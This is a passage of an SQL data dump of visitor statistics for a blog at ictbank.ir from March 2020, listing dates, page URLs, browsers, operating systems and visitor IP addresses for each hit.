(342,'2020-03-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,3,0),
(343,'2020-03-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.57.40.38','000',0,1,0),
(344,'2020-03-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.121.59','000',0,1,0),
(345,'2020-03-07','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.174.40.8','000',0,1,0),
(346,'2020-03-07','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','108.171.216.162','000',0,2,0),
(347,'2020-03-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.79.58','000',0,1,0),
(348,'2020-03-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','61.181.2.212','000',0,1,0),
(349,'2020-03-07','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','82.80.249.243','000',0,1,0),
(350,'2020-03-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','62.173.145.188','000',0,1,0),
(351,'2020-03-07','http://ictbank.ir/blog','Safari','OS X','10.14.6',NULL,NULL,'','77.42.57.184','000',0,2,0),
(352,'2020-03-07','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','47.106.243.125','000',0,3,0),
(353,'2020-03-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(354,'2020-03-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.165.142.108','000',0,1,0),
(355,'2020-03-08','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','109.120.151.30','000',0,1,0),
(356,'2020-03-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','46.107.230.122','000',0,1,0),
(357,'2020-03-08','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','87.239.255.108','000',0,1,0),
(358,'2020-03-08','http://ictbank.ir/blog','Chrome','OS X','10.12.3',NULL,NULL,'','115.56.230.46','000',0,1,0),
(359,'2020-03-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.57.231','000',0,1,0),
(360,'2020-03-08','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','154.8.147.166','000',0,1,0),
(361,'2020-03-08','http://ictbank.ir/blog','Android Browser','Android','10',NULL,NULL,'','5.78.157.201','000',0,1,0),
(362,'2020-03-08','http://ictbank.ir/blog','Android Browser','Android','10',NULL,NULL,'','103.246.38.196','000',0,1,0),
(363,'2020-03-09','http://ictbank.ir/dashtpodcast/wp-content/uploads/2020/02/E01_image.jpg','Firefox','Windows','5.1',NULL,NULL,'','89.234.68.81','000',0,11,0),
(364,'2020-03-09','http://example.com/blog','Unknown','Unknown','Unknown',NULL,NULL,'','69.162.80.182','000',0,1,0),
(365,'2020-03-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(366,'2020-03-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(367,'2020-03-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.43.157','000',0,2,0),
(368,'2020-03-09','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.234.217.183','000',0,1,0),
(369,'2020-03-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(370,'2020-03-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(371,'2020-03-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','167.172.97.0','000',0,1,0),
(372,'2020-03-10','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.52.254','000',0,1,0),
(373,'2020-03-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.243.171','000',0,1,0),
(374,'2020-03-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.184.196.195','000',0,1,0),
(375,'2020-03-10','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','142.93.87.106','000',0,1,0),
(376,'2020-03-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','82.196.3.42','000',0,1,0),
(377,'2020-03-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','206.189.57.208','000',0,1,0),
(378,'2020-03-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','167.71.53.130','000',0,1,0),
(379,'2020-03-10','http://design-arena.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','51.77.249.198','000',0,2,0),
(380,'2020-03-10','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','66.151.211.170','000',0,2,0),
(381,'2020-03-11','http://ictbank.ir/blog','Android Browser','Android','2.0',NULL,NULL,'','220.181.77.162','000',0,4,0),
(382,'2020-03-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(383,'2020-03-11','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','106.13.60.69','000',0,2,0),
(384,'2020-03-11','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','192.144.155.248','000',0,2,0),
(385,'2020-03-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.132.214.20','000',0,1,0),
(386,'2020-03-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(387,'2020-03-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.141.102','000',0,1,0),
(389,'2020-03-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','169.197.108.22','000',0,1,0),
(390,'2020-03-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.234.205','000',0,1,0),
(391,'2020-03-11','http://ictbank.ir/blog','Safari','iOS','13.3.1',NULL,NULL,'','8.20.127.56','000',0,1,0),
(392,'2020-03-11','http://www.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.158.82','000',0,1,0),
(393,'2020-03-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.234.217.183','000',0,1,0),
(394,'2020-03-12','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.43','000',0,1,0),
(395,'2020-03-12','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.210.83.78','000',0,1,0),
(396,'2020-03-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(397,'2020-03-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','92.246.85.233','000',0,1,0),
(398,'2020-03-12','http://www.design-arena.ir/blog/','Opera','Windows','10.0',NULL,NULL,'','104.238.39.50','000',0,1,0),
(399,'2020-03-12','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.234.102.192','000',0,1,0),
(400,'2020-03-12','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','34.232.127.140','000',0,1,0),
(401,'2020-03-12','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','38.206.1.252','000',0,1,0),
(402,'2020-03-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.44.93.197','000',0,1,0),
(403,'2020-03-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.218.248.107','000',0,1,0),
(404,'2020-03-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','142.93.231.36','000',0,1,0),
(405,'2020-03-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.195.146.140','000',0,1,0),
(406,'2020-03-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','169.197.108.6','000',0,1,0),
(407,'2020-03-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.203.0.195','000',0,1,0),
(408,'2020-03-12','http://ictbank.ir/blog','Chrome','OS X','10.13.4',NULL,NULL,'','166.62.126.3','000',0,1,0),
(409,'2020-03-12','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','123.16.227.104','000',0,1,0),
(410,'2020-03-12','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','88.248.3.85','000',0,1,0),
(411,'2020-03-12','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','202.141.248.34','000',0,1,0),
(412,'2020-03-12','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','216.144.233.115','000',0,1,0),
(413,'2020-03-12','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','1.55.219.27','000',0,1,0),
(414,'2020-03-12','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','31.167.42.6','000',0,1,0),
(415,'2020-03-12','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','103.146.222.119','000',0,1,0),
(416,'2020-03-12','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','139.5.230.30','000',0,1,0),
(417,'2020-03-12','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','117.247.40.77','000',0,1,0),
(418,'2020-03-12','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','182.76.139.18','000',0,1,0),
(419,'2020-03-12','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','113.161.67.96','000',0,1,0),
(420,'2020-03-12','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','177.98.221.146','000',0,1,0),
(421,'2020-03-12','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','182.76.99.138','000',0,1,0),
(422,'2020-03-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(423,'2020-03-12','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(424,'2020-03-12','http://ictbank.ir/blog','Chrome','Android','6.0',NULL,NULL,'','101.4.60.63','000',0,1,0),
(425,'2020-03-12','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','113.167.167.224','000',0,1,0),
(426,'2020-03-12','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','49.228.139.221','000',0,1,0),
(427,'2020-03-12','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','109.167.231.203','000',0,3,0),
(428,'2020-03-12','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','113.190.99.49','000',0,1,0),
(429,'2020-03-12','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','190.202.56.214','000',0,1,0),
(430,'2020-03-12','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','86.57.135.162','000',0,1,0),
(431,'2020-03-12','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','113.183.79.53','000',0,1,0),
(432,'2020-03-12','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','39.57.123.80','000',0,1,0),
(433,'2020-03-12','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','87.161.22.156','000',0,1,0),
(434,'2020-03-12','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','64.62.245.106','000',0,1,0),
(435,'2020-03-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.214.128.172','000',0,1,0),
(436,'2020-03-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.184.244.0','000',0,1,0),
(437,'2020-03-13','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.43','000',0,1,0),
(438,'2020-03-13','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','45.70.159.145','000',0,1,0),
(439,'2020-03-13','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','49.36.68.140','000',0,1,0),
(440,'2020-03-13','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','184.22.50.183','000',0,1,0),
(441,'2020-03-13','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','14.160.25.60','000',0,1,0),
(442,'2020-03-13','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','91.227.207.7','000',0,1,0),
(443,'2020-03-13','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','37.151.167.75','000',0,1,0),
(444,'2020-03-13','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','123.16.167.204','000',0,1,0),
(445,'2020-03-13','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','14.251.110.82','000',0,1,0),
(446,'2020-03-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','207.102.138.158','000',0,1,0),
(447,'2020-03-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','62.173.145.68','000',0,1,0),
(448,'2020-03-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','169.197.108.42','000',0,1,0),
(449,'2020-03-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(450,'2020-03-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','107.6.183.226','000',0,1,0),
(451,'2020-03-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(452,'2020-03-14','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','188.162.40.212','000',0,1,0),
(453,'2020-03-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.223.250','000',0,1,0),
(454,'2020-03-14','http://ictbank.ir/blog','Chrome','Android','4.2.1',NULL,NULL,'','66.249.83.119','000',0,1,0),
(455,'2020-03-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.88.239','000',0,2,0),
(456,'2020-03-14','http://ictbank.ir/blog','Sogou Explorer','Windows','5.1',NULL,NULL,'','106.13.164.254','000',0,1,0),
(457,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','106.212.168.202','000',0,1,0),
(458,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','119.152.62.81','000',0,1,0),
(459,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','217.244.214.18','000',0,1,0),
(460,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','109.239.35.123','000',0,1,0),
(461,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','197.210.226.101','000',0,1,0),
(462,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','128.76.249.128','000',0,1,0),
(463,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','118.70.43.26','000',0,1,0),
(464,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','201.174.187.74','000',0,1,0),
(465,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','123.27.31.9','000',0,1,0),
(466,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','103.68.17.162','000',0,1,0),
(467,'2020-03-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.208.6.47','000',0,1,0),
(468,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','81.214.69.87','000',0,1,0),
(469,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','42.118.38.222','000',0,1,0),
(470,'2020-03-14','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.43','000',0,2,0),
(471,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','114.142.220.236','000',0,1,0),
(472,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','95.23.131.82','000',0,1,0),
(473,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','42.116.181.43','000',0,1,0),
(474,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','188.163.9.147','000',0,1,0),
(475,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','160.179.89.11','000',0,1,0),
(476,'2020-03-14','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','180.163.220.4','000',0,1,0),
(477,'2020-03-14','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','42.236.10.114','000',0,1,0),
(478,'2020-03-14','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','180.163.220.3','000',0,1,0),
(479,'2020-03-14','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','42.236.10.75','000',0,1,0),
(480,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','201.62.108.142','000',0,1,0),
(481,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','119.82.68.251','000',0,1,0),
(482,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','197.41.246.27','000',0,1,0),
(483,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','103.52.254.191','000',0,1,0),
(484,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','188.76.21.68','000',0,1,0),
(485,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','41.129.75.102','000',0,1,0),
(486,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','49.48.219.6','000',0,1,0),
(487,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','112.211.63.49','000',0,1,0),
(488,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','14.233.70.65','000',0,1,0),
(489,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','176.51.158.112','000',0,1,0),
(490,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','171.251.233.42','000',0,1,0),
(491,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','187.141.175.5','000',0,1,0),
(492,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','91.161.6.135','000',0,1,0),
(493,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','176.36.132.146','000',0,1,0),
(494,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','14.234.64.250','000',0,1,0),
(495,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','190.249.138.16','000',0,1,0),
(496,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','189.216.104.141','000',0,1,0),
(497,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','95.252.81.50','000',0,1,0),
(498,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','120.89.76.124','000',0,1,0),
(499,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','92.220.96.155','000',0,1,0),
(500,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','128.234.126.211','000',0,1,0),
(501,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','186.123.144.204','000',0,1,0),
(502,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','92.241.48.252','000',0,1,0),
(503,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','85.139.214.68','000',0,1,0),
(504,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','197.45.231.13','000',0,1,0),
(505,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','123.17.33.255','000',0,1,0),
(506,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','36.71.232.108','000',0,1,0),
(507,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','41.108.241.232','000',0,1,0),
(508,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','129.208.194.182','000',0,1,0),
(509,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','128.75.148.171','000',0,1,0),
(510,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','185.177.96.31','000',0,1,0),
(511,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','1.1.183.44','000',0,1,0),
(512,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','117.210.192.135','000',0,1,0),
(513,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','177.240.135.99','000',0,1,0),
(514,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','122.252.246.169','000',0,1,0),
(515,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','113.188.70.43','000',0,1,0),
(516,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','188.3.86.67','000',0,1,0),
(517,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','223.207.249.1','000',0,1,0),
(518,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','196.65.142.129','000',0,1,0),
(519,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','118.68.163.237','000',0,1,0),
(520,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','165.51.228.134','000',0,1,0),
(521,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','46.160.179.140','000',0,1,0),
(522,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','82.155.97.99','000',0,1,0),
(523,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','201.163.111.188','000',0,1,0),
(524,'2020-03-14','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','37.214.62.185','000',0,1,0),
(525,'2020-03-14','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','114.67.109.108','000',0,2,0),
(526,'2020-03-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','207.102.138.158','000',0,1,0),
(527,'2020-03-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.88.225','000',0,1,0),
(528,'2020-03-14','http://design-arena.ir/blog/','Opera','Windows','6.1',NULL,NULL,'','84.17.51.123','000',0,3,0),
(529,'2020-03-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(530,'2020-03-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','204.186.48.8','000',0,1,0),
(531,'2020-03-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.43','000',0,1,0),
(533,'2020-03-15','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','52.14.173.3','000',0,1,0),
(534,'2020-03-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.38.214.181','000',0,1,0),
(535,'2020-03-15','http://design-arena.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','207.180.246.61','000',0,1,0),
(536,'2020-03-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','74.205.129.5','000',0,1,0),
(537,'2020-03-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','192.232.16.8','000',0,1,0),
(538,'2020-03-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','206.248.151.69','000',0,1,0),
(539,'2020-03-15','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','185.152.250.25','000',0,1,0),
(540,'2020-03-15','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','185.187.30.13','000',0,1,0),
(541,'2020-03-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','98.124.44.197','000',0,1,0),
(542,'2020-03-15','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.158.82','000',0,2,0),
(543,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','202.142.164.142','000',0,1,0),
(544,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','94.132.198.129','000',0,1,0),
(545,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','103.39.130.175','000',0,1,0),
(546,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','125.24.169.20','000',0,1,0),
(547,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','14.161.30.247','000',0,1,0),
(548,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','202.80.213.26','000',0,1,0),
(549,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','175.143.248.135','000',0,1,0),
(550,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','95.46.197.63','000',0,1,0),
(551,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','112.201.75.8','000',0,1,0),
(552,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','182.182.53.38','000',0,1,0),
(553,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','89.64.23.94','000',0,1,0),
(554,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','213.200.15.25','000',0,1,0),
(555,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','91.214.87.140','000',0,1,0),
(556,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','183.80.27.220','000',0,1,0),
(557,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','117.5.33.173','000',0,1,0),
(558,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','197.37.76.0','000',0,1,0),
(559,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','148.3.127.131','000',0,1,0),
(560,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','152.206.58.255','000',0,1,0),
(561,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','180.190.67.148','000',0,1,0),
(562,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','86.98.51.214','000',0,1,0),
(563,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','220.141.90.152','000',0,1,0),
(564,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','157.119.186.146','000',0,1,0),
(565,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','171.236.51.48','000',0,1,0),
(566,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','2.89.206.251','000',0,1,0),
(567,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','203.99.180.83','000',0,1,0),
(568,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','110.138.149.128','000',0,1,0),
(569,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','94.97.89.115','000',0,1,0),
(570,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','41.40.186.176','000',0,1,0),
(571,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','109.64.211.8','000',0,1,0),
(572,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','49.149.97.159','000',0,1,0),
(573,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','196.64.134.178','000',0,1,0),
(574,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','171.235.48.27','000',0,1,0),
(575,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','186.227.180.203','000',0,1,0),
(576,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','109.104.205.3','000',0,1,0),
(577,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','31.162.1.69','000',0,1,0),
(578,'2020-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','1.55.142.31','000',0,1,0),
